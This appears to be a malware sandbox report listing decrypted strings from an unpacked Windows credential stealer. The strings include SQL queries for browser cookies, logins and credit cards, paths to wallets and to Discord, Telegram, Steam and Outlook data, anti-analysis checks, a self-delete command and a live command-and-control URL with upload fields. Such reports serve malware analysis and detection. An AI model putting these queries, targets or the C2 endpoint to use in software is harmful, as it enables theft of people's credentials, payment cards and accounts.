Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: browser:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: profile:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: url:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: login:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: password:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Opera
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: OperaGX
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Network
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: cookies
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: .txt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: TRUE
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FALSE
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: autofill
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SELECT name, value FROM autofill
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: history
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: cc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: name:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: month:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: year:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: card:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Cookies
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Login Data
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Web Data
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: History
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: logins.json
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: formSubmitURL
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: usernameField
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: encryptedUsername
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: encryptedPassword
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: guid
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: cookies.sqlite
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: formhistory.sqlite
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: places.sqlite
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: plugins
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Local Extension Settings
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Sync Extension Settings
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: IndexedDB
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Opera Stable
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Opera GX Stable
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CURRENT
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: chrome-extension_
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: _0.indexeddb.leveldb
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Local State
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: profiles.ini
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: chrome
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: opera
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: firefox
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: wallets
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %08lX%04lX%lu
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ProductName
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: x32
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: x64
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ProcessorNameString
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DisplayName
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DisplayVersion
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Network Info:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - IP: IP?
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Country: ISO?
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: System Summary:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - HWID:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - OS:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Architecture:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - UserName:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Computer Name:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Local Time:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - UTC:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Language:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Keyboards:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Laptop:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Running Path:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - CPU:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Threads:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Cores:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - RAM:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Display Resolution:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - GPU:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: User Agents:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Installed Apps:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: All Users:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Current User:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Process List:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: system_info.txt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: freebl3.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: mozglue.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: msvcp140.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: nss3.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: softokn3.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: vcruntime140.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \Temp\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: .exe
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: runas
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: open
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: /c start
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %DESKTOP%
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %APPDATA%
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %LOCALAPPDATA%
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %USERPROFILE%
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %DOCUMENTS%
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %PROGRAMFILES%
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %PROGRAMFILES_86%
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %RECENT%
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: *.lnk
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: files
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \discord\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \Local Storage\leveldb
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \Telegram Desktop\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: key_datas
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: D877F783D5D3EF8C*
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: map*
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: A7FDF864FBC10B77*
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: A92DAA6EA6F891F2*
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: F8806DD0C461824F*
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Telegram
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Tox
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: *.tox
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: *.ini
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Password
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: 00000001
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: 00000002
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: 00000003
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: 00000004
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \Outlook\accounts.txt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Pidgin
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \.purple\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: accounts.xml
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: dQw4w9WgXcQ
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: token:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Software\Valve\Steam
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SteamPath
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \config\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ssfn*
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: config.vdf
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DialogConfig.vdf
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: libraryfolders.vdf
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: loginusers.vdf
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \Steam\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: browsers
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: done
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: soft
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \Discord\tokens.txt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: https
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: POST
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HTTP/1.1
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Content-Disposition: form-data; name="
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: hwid
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: build
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: token
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: file_name
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: file
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: message
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: screenshot.jpg
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetProcAddress
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: LoadLibraryA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: lstrcatA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: OpenEventA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateEventA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CloseHandle
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Sleep
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetUserDefaultLangID
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VirtualAllocExNuma
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VirtualFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetSystemInfo
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VirtualAlloc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HeapAlloc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetComputerNameA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: lstrcpyA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetProcessHeap
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetCurrentProcess
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: lstrlenA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ExitProcess
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetSystemTime
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SystemTimeToFileTime
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: advapi32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: gdi32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: user32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: crypt32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ntdll.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetUserNameA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateDCA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetDeviceCaps
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ReleaseDC
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CryptStringToBinaryA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sscanf
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VMwareVMware
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HAL9TH
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: JohnDoe
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DISPLAY
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %hu/%hu/%hu
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: http://85.28.47.31
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: silence
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: /5499d72b3a3e55be.php
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: /8405906461a5200c/
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sila
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetFileAttributesA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalLock
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HeapFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetFileSize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalSize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: IsWow64Process
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Process32Next
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetLocalTime
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FreeLibrary
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetTimeZoneInformation
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetSystemPowerStatus
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetVolumeInformationA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Process32First
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetLocaleInfoA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetModuleFileNameA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DeleteFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FindNextFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: LocalFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FindClose
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: LocalAlloc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetFileSizeEx
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ReadFile
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SetFilePointer
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: WriteFile
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FindFirstFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CopyFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VirtualProtect
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetLastError
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: lstrcpynA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: MultiByteToWideChar
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: WideCharToMultiByte
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalAlloc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: OpenProcess
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: TerminateProcess
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetCurrentProcessId
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: gdiplus.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ole32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: bcrypt.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: wininet.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: shlwapi.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: shell32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: psapi.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: rstrtmgr.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SelectObject
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BitBlt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DeleteObject
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateCompatibleDC
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipGetImageEncoders
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdiplusStartup
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdiplusShutdown
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipSaveImageToStream
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipDisposeImage
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetHGlobalFromStream
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CoUninitialize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CoInitialize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CoCreateInstance
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptDecrypt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptSetProperty
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptDestroyKey
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetWindowRect
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetDesktopWindow
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetDC
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CloseWindow
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: wsprintfA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CharToOemW
